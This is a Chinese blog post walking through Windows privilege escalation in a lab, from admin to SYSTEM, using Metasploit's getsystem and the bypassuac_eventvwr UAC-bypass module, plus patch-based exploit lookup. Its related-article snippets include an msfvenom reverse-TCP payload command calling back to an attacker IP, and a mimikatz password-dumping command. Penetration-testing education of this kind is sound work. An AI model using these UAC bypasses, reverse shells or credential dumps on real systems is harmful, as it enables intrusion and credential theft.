Windows提权的各种姿势

最新推荐文章于 2024-03-27 08:00:00 发布
最新推荐文章于 2024-03-27 08:00:00 发布
阅读量323 收藏
点赞数
分类专栏: 内网渗透 文章标签: windows 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Destiny_one/article/details/108042975
版权

准备环境:一台linux虚拟机
一台win7虚拟机

在渗透到win7的机器上以后,我们可以看到我们的最初用户是
win-ulrnu8m8tl5\lenovo
在这里插入图片描述
在这里插入图片描述

这个用户是属于管理员权限,我们下来要做的操作就是把我们的管理员权限提升到system权限。

我们首先用getsystem命令试一下能不能提权,最后不出意料的失败了,因为在win7系统之后,有了uac的防护,getsystem命令大多时候是不会成功的。
在这里插入图片描述
那我们下来就使用bypassuac模块的exp,对其进行提权。
我们使用exploit/windows/local/bypassuac_eventvwr 来对其绕过uac
在这里插入图片描述
我们可以看到已经成功了,下来我们切换到进程2,来对其进行提权
在这里插入图片描述
再次使用getsystem命令进行提权,我们可以看到这次成功了,把管理员权限成功提升到system权限

另一种提权方式就是通过漏洞提权,我们先查看目标机的补丁状况
在这里插入图片描述
然后我们把这复制到提权辅助的工具中,会自动帮我们分析出目标机没有打补丁得状况并给出exp
在这里插入图片描述
然后使用相应的exp在大部分情况下都可以进行渗透提权,下来我就不再一一演示了,大家可以上网搜相应的漏洞exp和实操。

鸣蜩十四
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
windows提权的几种姿势
weixin_44300286的博客
09-07 4169
一、工具提权 1、msf提权 准备阶段: 用msfvenom生成一个马:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.112 lport=4444 -f exe > 3.exe 然后用msf开启一个监听: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.112 set lport 4444 expl
Windows常见的几种提权方法
热门推荐
hackzkaq的博客
05-20 1万+
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全—杰斯 提权,提高自己在服务器中的权限,主要针对网站渗透过程中,当渗透某一网站时,通过各种漏洞提升WEBSHELL权限以夺得该服务器权限,通常提权是把普通用户的权限提升到管理员权限或者系统权限 在渗透测试过程中,拿到一个webshell之后,一般来说,我们的权限都是目标服务器中间件的权限。 这个时候就需要利用各种漏洞来提升自己的权限,从而能够获得对目标服务器的控制。 1.补丁查询法 简介 补丁一般都是为了应对计算机中存在的漏洞,为了更好的优化计算机的
权限提升-Win系统权限提升篇&计算机用户&UAC绕过&DLL劫持&未引号路径
siu~
03-27 662
1、计算机用户到System-入口点和应用点 2、计算机用户到System-UAC绕过&DLL劫持&未引号服务 章节点: 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、域控权限提升及转移
系统提权——Windows系统提权
JulySec的博客
02-13 1843
系统提权——Windows系统提权。 1、使用系统自带命令提权; 2、进程注入; 3、令牌窃取; 4、DLL劫持; 5、不安全的服务配置。 UAC机制的绕过
Win11干啥都要提权的解决办法
大数据流浪法师的学习笔记与分享
10-21 310
Windows11系统中,即使你是专业版系统下,并且使用了Administrator账户,在进行某些操作时还是需要弹出一个窗口来确定管理员权限,这就导致在程序开发的过程中很不方便,因为不是每个IDE都能时刻保持管理员权限。这个选项一定要选择Disabled,这样就不用每次都弹出一个对话框来确定了。
【内网安全】——Windows提权姿势
Demo不是emo的博客
02-06 5121
超详细的windows提权姿势汇总
Linux提权姿势二:利用NFS提权
09-01
Linux提权姿势二:利用NFS提权
小程序各种姿势实现登录
03-29
喜闻乐见的背景时间--由于最近接触小程序比较多,又刚好经历过小程序的自动登录时代以及现在的点击登录时代。结合自己的实践以及观察到其他小程序的做法,就有了这篇小分享~ 本文可能涉及的内容-- ...
产品经理给开发提埋点需求的正确姿势
02-25
本文作者将以某社交APP为例,阐述产品经理给开发提埋点需求的正确姿势。enjoy~作为一枚产品经理,对埋点一定不陌生,每一款产品多少都会有数据统计的需求,互联网发展到今天,互联网公司对数据的需求也不仅仅限于PV...
CTF中Web各种题目的解题姿势PPT模板
02-21
CTF中Web各种题目的解题姿势PPT模板
Windows系统提权简单总结
Aiwin的博客
07-13 1795
Windows系统提权简单总结
解决win10提权问题,一键提权,方便
07-26
希望能帮助大家,大家可以试试,我就是这么解决的,很方便
Windows权限提升
Williamanddog的博客
02-07 2304
kiwi_cmd可以使用mimikatz的全部功能,比如kiwi_cmd sekurlsa::logonpasswords获取明文密码。run post/multi/recon/local_exploit_suggester查询哪些提权exp可以用。systeminfo查看系统补丁:一般的,如果网站安全做好的的情况下,会有几百个补丁。tasklist 查看当前运行的进程,是否有av,可利用的第三方的服务提权等。systeminfo 查看服务器信息及相应的补丁,可找相应的补丁提权
Kotlin 实现动态获权的两种方式?
yyxhzdm的博客
09-21 804
一、自定义 1.在项目的BaseActivity添加代码 /** * 动态获权 * */ /** * 动态获权请求值 */ private var REQUEST_CODE_PERMISSION = 0x00099 protected val TAG = this.javaClass.simpleName /** * 请求权限 * 动态获权 * @param permissions 请求的权限 * @param requestCode 请求权限的请求码 */ open fun re
Metasploit联动CobaltStrike渗透win11主机并提权
Locosomnus的博客
04-01 1627
算是一个学习记录吧,很菜,欢迎大佬的骂
关于win11管理员提权方法的补充技巧
應無所住
10-24 1719
win11原因不明的故障,有可能是因为没有管理员权限导致,那么如何获取管理员权限,也就是对账户进行提权呢?本文分享了作者在操作过程中的一些意外小收获,如果对您有所帮助,一切功德归于三宝,回向法界有情早成佛道!
Windows最最最常见的几种提权方法
2301_80115097的博客
12-12 619
Windows SMB 服务器特权提升漏洞(CVE漏洞编号:CVE-2016-3225)当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞,成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。提权,提高自己在服务器中的权限,主要针对网站渗透过程中,当渗透某一网站时,通过各种漏洞提升WEBSHELL权限以夺得该服务器权限,通常提权是把普通用户的权限提升到管理员权限或者系统权限。要利用此漏洞,攻击者首先必须登录到系统。
windows提权
qq_58000413的博客
05-19 1694
1、提权介绍权限提升:攻击者通过安全漏洞把获取到的受限制的低权限用户突破限制,提权至高权限的管理员用户,从而获取对整个系统的控制权2、提权分类本地提权:在一个地权限用户下,通过一些条件(应用程序漏洞、系统漏洞等)直接提升到系统最高权限。远程提权:攻击者通过漏洞利用程序直接获取远程服务器的权限操作系统提权windows:ms06-067、ms10-084、ms11-014、ms11-05等等linux:cve-2017-7308、cve-2017-6074、cve-2017-5123等等。
Python姿势识别
最新发布
04-17
Python姿势识别是一种利用计算机视觉技术来检测和识别人体姿势的方法。它可以通过摄像头或者图像输入,对人体的关键点进行检测和跟踪,从而实现对人体姿势的分析和识别。 在Python中,有一些常用的库和工具可以用来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值